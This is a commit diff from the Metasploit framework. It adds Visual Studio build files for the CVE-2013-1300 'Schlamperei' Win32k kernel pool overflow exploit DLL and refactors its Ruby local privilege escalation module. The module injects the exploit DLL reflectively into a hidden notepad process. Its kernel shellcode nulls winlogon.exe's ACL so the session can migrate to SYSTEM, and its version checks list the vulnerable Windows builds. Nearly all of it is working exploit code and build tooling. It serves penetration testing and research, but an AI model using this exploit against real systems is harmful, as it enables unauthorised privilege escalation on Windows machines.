Refactoring exploit and adding build files for dll.
parent
257c121c75
commit
41720428e4
|
@ -0,0 +1,20 @@
|
||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 11.00
|
||||||
|
# Visual Studio 2010
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-1300", "cve-2013-1300\cve-2013-1300.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|Win32 = Debug|Win32
|
||||||
|
Release|Win32 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
|
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
|
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
|
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
|
@ -7,13 +7,16 @@
|
||||||
* found and exploited by nils and jon of @mwrlabs
|
* found and exploited by nils and jon of @mwrlabs
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
|
||||||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||||
#include "ReflectiveLoader.c"
|
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
// Purloined from ntstatus.h
|
// Purloined from ntstatus.h
|
||||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
|
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
|
||||||
|
|
||||||
|
#define WIN32_NO_STATUS
|
||||||
|
#include <windows.h>
|
||||||
|
#undef WIN32_NO_STATUS
|
||||||
|
|
||||||
#ifndef _NTDEF_
|
#ifndef _NTDEF_
|
||||||
typedef __success(return >= 0) LONG NTSTATUS;
|
typedef __success(return >= 0) LONG NTSTATUS;
|
96
external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj
vendored
Executable file
96
external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj
vendored
Executable file
|
@ -0,0 +1,96 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<ProjectGuid>{C093C490-61BF-433E-AEB4-80753B20DEC7}</ProjectGuid>
|
||||||
|
<Keyword>Win32Proj</Keyword>
|
||||||
|
<RootNamespace>Schlamperei_DLL</RootNamespace>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||||
|
<Optimization>MaxSpeed</Optimization>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="cve-2013-1300.cpp">
|
||||||
|
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||||
|
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
|
||||||
|
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||||
|
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
|
||||||
|
<PrecompiledHeaderFile Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
</PrecompiledHeaderFile>
|
||||||
|
<PrecompiledHeaderOutputFile Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
</PrecompiledHeaderOutputFile>
|
||||||
|
<PrecompiledHeaderFile Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
</PrecompiledHeaderFile>
|
||||||
|
<PrecompiledHeaderOutputFile Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
</PrecompiledHeaderOutputFile>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
|
|
@ -0,0 +1,17 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\cve-2013-1300.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building CVE-2013-1300 Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) x86 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="CVE-2013-1300 is not supported in x64" />
|
||||||
|
</Target>
|
||||||
|
</Project>
|
|
@ -47,6 +47,13 @@ IF "%ERRORLEVEL%"=="0" (
|
||||||
POPD
|
POPD
|
||||||
)
|
)
|
||||||
|
|
||||||
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
|
ECHO "Building CVE-2013-1300 (schlamperei)"
|
||||||
|
PUSHD CVE-2013-1300
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
)
|
||||||
|
|
||||||
IF "%ERRORLEVEL%"=="0" (
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
ECHO "Building bypassuac (on-disk)"
|
ECHO "Building bypassuac (on-disk)"
|
||||||
PUSHD bypassuac
|
PUSHD bypassuac
|
||||||
|
|
|
@ -18,16 +18,21 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info, {
|
super(update_info(info, {
|
||||||
'Name' => 'ms13_053_schlamperei',
|
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
A kernel pool overflow in Win32k which allows local privilege escalation. Used in pwn2own 2013 to break out of chrome's sandbox.
|
A kernel pool overflow in Win32k which allows local privilege escalation.
|
||||||
|
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
|
||||||
|
This allows any unprivileged process to freely migrate to winlogon.exe, achieving
|
||||||
|
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
|
||||||
|
NOTE: when you exit the meterpreter session, winlogon.exe is lickely to crash.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Nils&Jon (MWR) - original exploit',
|
'Nils', #Original Exploit
|
||||||
'Donato Capitella - ported to metasploit',
|
'Jon', #Original Exploit
|
||||||
'Ben Campbell - ported to metasploit'
|
'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
|
||||||
|
'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
|
@ -58,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
def check
|
def check
|
||||||
os = sysinfo["OS"]
|
os = sysinfo["OS"]
|
||||||
if (os =~ /windows/i) == nil
|
unless (os =~ /windows/i)
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -70,7 +75,11 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
when 7600
|
when 7600
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
when 7601
|
when 7601
|
||||||
return Exploit::CheckCode::Vulnerable if revision <= 1800
|
if branch == 18
|
||||||
|
return Exploit::CheckCode::Vulnerable if revision < 18176
|
||||||
|
else
|
||||||
|
return Exploit::CheckCode::Vulnerable if revision < 22348
|
||||||
|
end
|
||||||
end
|
end
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
@ -87,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
|
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
|
||||||
end
|
end
|
||||||
|
|
||||||
if check != Exploit::CheckCode::Vulnerable
|
unless check == Exploit::CheckCode::Vulnerable
|
||||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Launching notepad to host the exploit...")
|
print_status("Launching notepad to host the exploit...")
|
||||||
notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
notepad_process_pid = cmd_exec_get_pid("notepad.exe")
|
||||||
begin
|
begin
|
||||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
|
||||||
print_good("Process #{process.pid} launched.")
|
print_good("Process #{process.pid} launched.")
|
||||||
rescue Rex::Post::Meterpreter::RequestError
|
rescue Rex::Post::Meterpreter::RequestError
|
||||||
print_status("Operation failed. Trying to elevate the current process...")
|
print_status("Operation failed. Trying to elevate the current process...")
|
||||||
|
@ -102,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||||
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.dll")
|
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "cve-2013-1300.dll")
|
||||||
library_path = ::File.expand_path(library_path)
|
library_path = ::File.expand_path(library_path)
|
||||||
|
|
||||||
print_status("Injecting exploit into #{process.pid}...")
|
print_status("Injecting exploit into #{process.pid}...")
|
||||||
|
@ -111,8 +120,8 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
thread = process.thread.create(exploit_mem + offset)
|
thread = process.thread.create(exploit_mem + offset)
|
||||||
client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)
|
client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)
|
||||||
|
|
||||||
processes = client.sys.process.get_processes
|
|
||||||
processes.each do |p|
|
client.sys.process.each_process do |p|
|
||||||
if p['name'] == "winlogon.exe"
|
if p['name'] == "winlogon.exe"
|
||||||
winlogon_pid = p['pid']
|
winlogon_pid = p['pid']
|
||||||
print_status("Found winlogon.exe with PID #{winlogon_pid}")
|
print_status("Found winlogon.exe with PID #{winlogon_pid}")
|
Loading…
Reference in New Issue